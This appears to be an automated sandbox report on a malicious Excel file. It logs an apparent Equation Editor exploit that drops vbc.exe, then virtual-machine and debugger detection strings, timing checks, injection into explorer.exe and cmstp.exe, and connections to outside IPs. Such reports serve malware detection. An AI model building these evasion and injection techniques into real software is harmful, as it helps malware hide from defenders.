Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2180582325.0000000002474000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2716, type: MEMORY

Analysis Report Doc_37584567499454.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 00000000000F85E4 second address: 00000000000F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 00000000000F897E second address: 00000000000F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2760	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2380	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 1756	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed

Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: explorer.exe, 0000000B.00000002.2381072521.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.2188908052.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMwareHD6m
Source: explorer.exe, 0000000B.00000000.2188935970.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2179777890.00000000006AC000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: explorer.exe, 0000000B.00000000.2188908052.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMware HD6m
Source: vbc.exe, 00000004.00000002.2179858583.000000000074B000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: 5m"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: 5m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000B.00000002.2381106574.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: vmware8
Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmp	Binary or memory string: VMWAREHD6m

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 10_2_00920080 mov ecx, dword ptr fs:[00000030h]	10_2_00920080
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009200EA mov eax, dword ptr fs:[00000030h]	10_2_009200EA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009426F8 mov eax, dword ptr fs:[00000030h]	10_2_009426F8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F526F8 mov eax, dword ptr fs:[00000030h]	12_2_01F526F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 100.24.208.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.209.107.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.105.124.225 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior